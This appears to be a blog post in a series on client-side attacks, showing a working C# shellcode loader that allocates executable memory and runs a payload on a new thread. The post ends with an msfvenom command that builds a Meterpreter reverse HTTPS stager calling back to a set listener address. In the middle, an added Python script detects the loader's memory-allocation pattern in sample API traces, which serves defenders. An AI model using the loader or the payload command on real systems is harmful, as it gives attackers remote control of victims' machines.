This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.
Running Shell Code in C#
Using lessons learnt over the last few weeks from both VBA and PowerShell, we use VirtualAlloc, CreateThread and WaitForSingleObject to execute shellcode in memory from C#.
Next, we need to generate our shellcode (see below). On a 64-bit Windows operating system, Jscript will execute in a 64-bit context by default, so we have to generate a 64-bit Meterpreter staged payload in C# format.
Looking at the code in detail, starting with the variables: the first is buf, which contains the shellcode. Next is the size variable, which stores the length of buf.
We then use the WaitForSingleObject API to wait for the shellcode to finish executing. Otherwise, the Jscript execution would terminate the process before the shell becomes active.
We must set the CPU architecture to x64 since we are using 64-bit shellcode. This is done through the CPU drop-down menu, where we open the
Code Example
using System;
using System.Runtime.InteropServices;

namespace ConsoleApp1
{
    class Program
    {
        // VirtualAlloc: reserve and commit a region of memory in the current process.
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        // CreateThread: start a new thread whose entry point is lpStartAddress.
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        // WaitForSingleObject: block until the handle is signalled (here, until the thread exits).
        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        static void Main(string[] args)
        {
            // buf holds the shellcode generated by msfvenom (see "The Payload" below).
            byte[] buf = new byte[687] {
            0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00 .... <SNIP>};
            int size = buf.Length;

            // 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
            // Allocate the size of the buffer rather than a fixed 0x1000 so a payload
            // larger than one page cannot be copied past the end of the region.
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)size, 0x3000, 0x40);

            // Copy the shellcode into the RWX region.
            Marshal.Copy(buf, 0, addr, size);

            // Run it on a new thread and wait (INFINITE = 0xFFFFFFFF) for it to finish.
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}
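From the defender's side, the three calls above leave a very recognisable trace: a private allocation with flAllocationType 0x3000 (MEM_COMMIT | MEM_RESERVE) and flProtect 0x40 (PAGE_EXECUTE_READWRITE), followed by a CreateThread whose start address lies inside that freshly allocated region. The following Python script is an added example, not code from the original post: it decodes those kernel32 constants and runs that two-step correlation over a few constructed API-trace lines (the key=value line format, the pids and the addresses are all made up for the example; a real EDR or API-monitor export would need its own parser).

```python
import re

# kernel32 constants (the C# sample passes these as the raw literals 0x3000 and 0x40).
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
ALLOC_FLAGS = {MEM_COMMIT: "MEM_COMMIT", MEM_RESERVE: "MEM_RESERVE"}
PROTECT_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# Constructed sample trace (hypothetical key=value format, not a real tool's output).
# pid 4120 behaves like the C# program above; pid 9001 is benign activity.
SAMPLE_TRACE = """\
pid=4120 api=VirtualAlloc lpAddress=0x0 dwSize=0x1000 flAllocationType=0x3000 flProtect=0x40 ret=0x1f2a0000
pid=4120 api=CreateThread lpStartAddress=0x1f2a0000 dwCreationFlags=0x0 ret=0x2c8
pid=4120 api=WaitForSingleObject hHandle=0x2c8 dwMilliseconds=0xffffffff ret=0x0
pid=9001 api=VirtualAlloc lpAddress=0x0 dwSize=0x10000 flAllocationType=0x3000 flProtect=0x04 ret=0x22b00000
pid=9001 api=CreateThread lpStartAddress=0x7ffb1a2c3000 dwCreationFlags=0x0 ret=0x1a4
"""

_KV = re.compile(r"(\w+)=(\S+)")
_NUM = re.compile(r"0x[0-9a-fA-F]+|\d+")


def parse_line(line):
    """Turn one 'key=value key=value' trace line into a dict; numeric values become ints."""
    fields = {}
    for key, val in _KV.findall(line):
        fields[key] = int(val, 0) if _NUM.fullmatch(val) else val
    return fields


def decode_alloc(flags):
    """Name the MEM_* bits set in flAllocationType, e.g. 0x3000 -> MEM_COMMIT|MEM_RESERVE."""
    names = [name for bit, name in ALLOC_FLAGS.items() if flags & bit]
    return "|".join(names) if names else hex(flags)


def decode_protect(flags):
    """Name the base PAGE_* protection (modifier bits such as PAGE_GUARD are masked off)."""
    return PROTECT_NAMES.get(flags & 0xFF, hex(flags))


def is_rwx(flags):
    """True when the protection is both writable and executable (only 0x40 and 0x80 qualify)."""
    base = flags & 0xFF
    return base in EXECUTABLE and base in WRITABLE


def detect(trace_text):
    """Correlate, per pid, RWX VirtualAlloc calls with CreateThread entries inside them."""
    rwx_regions = {}  # pid -> list of (base, end) for RWX regions seen so far
    findings = []
    for raw in trace_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        pid, api = ev.get("pid"), ev.get("api")
        if api == "VirtualAlloc" and is_rwx(ev["flProtect"]) and ev["ret"]:
            base, size = ev["ret"], ev["dwSize"]
            rwx_regions.setdefault(pid, []).append((base, base + size))
            findings.append({
                "pid": pid, "indicator": "rwx_private_alloc",
                "detail": f"{decode_alloc(ev['flAllocationType'])} "
                          f"{decode_protect(ev['flProtect'])} at {base:#x} size {size:#x}",
            })
        elif api == "CreateThread":
            start = ev["lpStartAddress"]
            for base, end in rwx_regions.get(pid, []):
                if base <= start < end:
                    findings.append({
                        "pid": pid, "indicator": "thread_start_in_rwx_alloc",
                        "detail": f"thread entry {start:#x} inside RWX region {base:#x}-{end:#x}",
                    })
                    break
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_TRACE):
        print(f"pid {finding['pid']}: {finding['indicator']} ({finding['detail']})")
```

The two indicators are deliberately separate: an RWX private allocation on its own is unusual enough in most processes to be worth a medium-severity alert, while a thread whose entry point is inside such a region is the high-confidence signal that matches this exact sample. The check only fires on protections that are writable and executable at allocation time, so it is a narrow rule rather than a general purpose one, and it depends on having per-process API telemetry that records the returned address of VirtualAlloc.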
The Payload
The payload used in the buf variable is created with msfvenom as the Meterpreter reverse HTTPS stager on port 443.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.60 LPORT=443 EXITFUNC=thread -f csharp